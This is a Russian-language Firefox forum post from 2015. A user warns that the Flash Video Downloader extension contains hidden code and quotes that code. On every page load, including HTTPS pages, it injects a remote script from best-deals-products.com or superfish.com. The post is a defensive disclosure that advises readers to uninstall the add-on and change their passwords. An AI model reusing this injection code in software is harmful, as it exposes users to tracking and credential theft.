|
>Форум Mozilla Россия http://forum.mozilla-russia.org/index.php >Расширения для Firefox http://forum.mozilla-russia.org/viewforum.php?id=2 >Flash Video Downloader - malware в последней версии http://forum.mozilla-russia.org/viewtopic.php?id=67218 |
| Smoke_kz > 26-04-2015 14:28:51 |
После установки данного дополнения при загрузке любой страницы Firefox соединяется с каким-то левым сайтом www.best-deals-products.com. При разборе оказалось, что в коде дополнения есть строки: скрытый текст Выделить код Код:if( !win.superfish ){
dump("\n\nInsert superfish into: "+ document.location.href +"\n\n");
var userId = getUUID();
//var injectUrl = "www.best-deals-products.com/ws/sf_main.jsp?dlsource=lwjyocpk&CTID=xyz";
//var injectUrl = "www.superfish.com/ws/sf_main.jsp?dlsource=vjartpv&CTID=fvdmoz";
var injectUrl = "www.best-deals-products.com/ws/sf_main.jsp?dlsource=vjartpv&CTID=fvdmoz";
if( document.location.href.indexOf("https:") === 0 ){
injectUrl = "https://" + injectUrl;
}
else{
injectUrl = "http://" + injectUrl;
}
var script = document.createElement("script");
script.setAttribute( "src", injectUrl );
document.head.appendChild( script );
}Судя по коду (поправьте), дополнение встраивает вызов каких-то скриптов с сайтов www.best-deals-products.com и www.superfish.com при загрузке любой страницы. Что это за скрипты - одним разработчикам этих скриптов известны. Разработчик же дополнения клянётся и божится, что ничего плохого дополнение не делает. Всем, кто пользуется данным дополнением рекомендую его удалить и поменять пароли, хранящиеся в базе Firefox. И, если не лень, оставить отзыв на странице дополнения. скрытый текст Это чудо просит за него донат в размере 50$. Совсем обнаглел. |